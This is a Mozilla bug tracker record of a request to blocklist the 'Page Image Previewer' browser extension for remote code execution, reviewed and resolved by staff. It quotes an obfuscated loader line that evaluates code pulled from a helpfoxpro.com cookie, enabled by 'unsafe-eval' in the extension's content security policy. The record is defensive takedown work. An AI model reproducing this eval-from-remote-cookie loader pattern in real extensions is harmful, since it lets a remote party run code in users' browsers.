Closed Bug 1551260 Opened 6 years ago Closed 6 years ago

Extension Block Request: Page Image Previewer

Categories

(Toolkit :: Blocklist Policy Requests, task)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
task
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: robwu, Assigned: TheOne)

Details
Extension name Page Image Previewer
Extension versions affected <all versions>
Platforms affected <all platforms>
Block severity hard

Reason

Remote code exeuction.

Extension IDs

{61121092-5257-4607-b16a-12364832f0e4}

Additional Information

The extension's manifest.json Content-Security-Policy contains 'unsafe-eval'. The source code contains the following snippet:

window[wec[0]](firm(wec[1]))

... and the variables are extracted from a cookie at the helpfoxpro.com domain, which enables remote code execution.

Assignee: nobody → awagner
Status: NEW → ASSIGNED
Type: defect → task

I reviewed this add-on and confirm it violates Mozilla's add-on policy by executing remote code.

The block has been staged. Philipp, can you please review and push?

Flags: needinfo?(philipp)

Done

Group: blocklist-requests
Status: ASSIGNED → RESOLVED
Closed: 6 years ago
Flags: needinfo?(philipp)
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.